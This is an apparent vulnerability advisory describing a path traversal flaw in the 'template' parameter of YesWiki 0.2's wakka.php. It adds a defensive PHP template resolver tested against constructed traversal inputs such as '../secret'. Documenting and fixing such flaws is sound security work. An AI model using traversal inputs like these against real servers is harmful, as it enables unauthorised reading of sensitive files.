Vendor: YesWiki
By: HaHwul
CVSS: 7.5 (HIGH)
CWE: 22 (Path Traversal)
Product Name: YesWiki
Affected Version From: yeswiki 0.2
Affected Version To: yeswiki 0.2
Patch Exists: NO
Related CWE: none
CPE: a:yeswiki:yeswiki
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Debian [Wheezy], Ubuntu
2015
YESWIKI 0.2 – Path Traversal (template param)
YesWiki 0.2 is vulnerable to path traversal. User-supplied input to the 'template' parameter of the 'wakka.php' script is insufficiently sanitized, so an attacker can send a specially crafted HTTP request to the vulnerable script and read sensitive files from the server.
Mitigation:
Input validation should be performed to ensure that user-supplied input is properly sanitized.
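
One way to apply the input validation recommended above to a file-selecting parameter such as 'template', shown as an added example and not YesWiki's own code. The function name `resolveTemplate`, the `templates` directory and the `.tpl.html` extension are assumptions, and the sample inputs are constructed.

```php
<?php
// Added example with hypothetical names; not taken from YesWiki.

/**
 * Resolve a user-supplied template name to a file inside $baseDir.
 * Returns the canonical path, or null when the name is rejected.
 */
function resolveTemplate(string $baseDir, string $name): ?string
{
    // 1. Allowlist the shape of the name: no separators, dots or NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }

    // 2. Canonicalise (resolves symlinks and "..") and require a regular file.
    //    The extension is fixed by the server, never taken from the request.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.tpl.html');
    if ($path === false || !is_file($path)) {
        return null;
    }

    // 3. Containment check: the canonical path must still sit under $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo tree: one valid template, one file outside the directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/templates', 0700, true);
file_put_contents($root . '/templates/default.tpl.html', '<html></html>');
file_put_contents($root . '/secret.tpl.html', 'outside the template directory');

// Constructed inputs: one legitimate name and several that must be refused.
foreach (['default', '../secret', 'default/../../secret', "default\0", ''] as $input) {
    $resolved = resolveTemplate($root . '/templates', $input);
    printf("%-28s => %s\n", json_encode($input), $resolved === null ? 'rejected' : 'served');
}
```

The allowlist alone stops separator-based names; the `realpath` containment check additionally covers a symlink placed inside the template directory that points elsewhere.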